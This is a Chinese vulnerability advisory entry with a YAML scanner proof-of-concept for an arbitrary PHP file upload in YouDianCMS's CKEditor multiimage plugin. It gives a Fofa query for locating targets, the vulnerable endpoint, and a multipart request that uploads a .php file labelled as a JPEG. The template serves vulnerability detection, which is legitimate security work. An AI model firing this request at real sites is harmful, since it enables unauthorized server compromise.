漏洞描述
友点CMS存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件,获取服务器权限。
Fofa: app="友点建站-CMS" && product="友点建站-CMS"
youdian-cms-ckeditor-fileupload: YouDianCMS 友点系统 CKEditor 任意文件上传
PoC代码[已公开]
id: youdian-cms-ckeditor-fileupload
info:
name: YouDianCMS 友点系统 CKEditor 任意文件上传
author: zan8in
severity: critical
verified: true
description: |-
友点CMS存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件,获取服务器权限。
Fofa: app="友点建站-CMS" && product="友点建站-CMS"
reference:
- https://mp.weixin.qq.com/s/oiNffCThHJsfLhePlZjTBA
tags: youdian,ckeditor
created: 2024/02/26
set:
filename: randomInt(100000, 999999)
randbody: randomLowercase(16)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"files\";filename=\"{{filename}}.php\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
{{randbody}}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'"result":"200"') && response.body.bcontains(b'"msg":')
expression: r0()